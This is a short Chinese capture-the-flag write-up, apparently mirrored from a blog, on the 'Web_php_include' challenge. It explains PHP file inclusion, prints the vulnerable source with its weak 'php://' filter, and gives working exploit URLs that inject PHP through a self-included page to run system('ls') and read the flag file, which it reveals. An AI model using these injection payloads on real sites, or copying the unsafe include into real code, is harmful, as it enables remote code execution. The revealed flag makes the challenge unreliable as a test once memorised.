zoukankan      html  css  js  c++  java
  • Web_php_include

    Web_php_include

    首先来了解一下文件包含:
    文件包含是开发语言自带的一个功能,程序员为了方便,或者是设计需求需要,写了一些文件包含进去,当文件包含的代码文件被写成了一个变量,且这个变量可以由前端传进来,则可能引发文件包含漏洞,分为本地包含和远程包含,可被攻击者利用搜集敏感信息

    可以去参考pikachu靶场的文件包含漏洞的详解:File Inclusion

    来查看一下源码

    <?php
    show_source(__FILE__);
    echo $_GET['hello'];
    $page=$_GET['page'];
    while (strstr($page, "php://")) {
        $page=str_replace("php://", "", $page);
    }
    include($page);
    ?>
    

    这里面定义了一个变量page,通过包含函数include(),可以通过它传递页面,再通过hello参数执行一些命令

    http://220.249.52.133:49386/?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>
    //可知fl4gisisish3r3.php页面存在
    
    http://220.249.52.133:49386/?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>
    

    得到flag为:ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

  • 相关阅读:
    简单伪类
    购物网页css
    「WC2020T2」猜数
    ARC 103
    Codeforces 1198F
    ZJOI2019二试游记
    ZJOI2019一试游记
    「WC2015」未来程序
    「CodeForces Round #545 Div2」划水记
    「CF1116」Microsoft Q# Coding Contest
  • 原文地址:https://www.cnblogs.com/sillage/p/13929571.html
Copyright © 2011-2022 走看看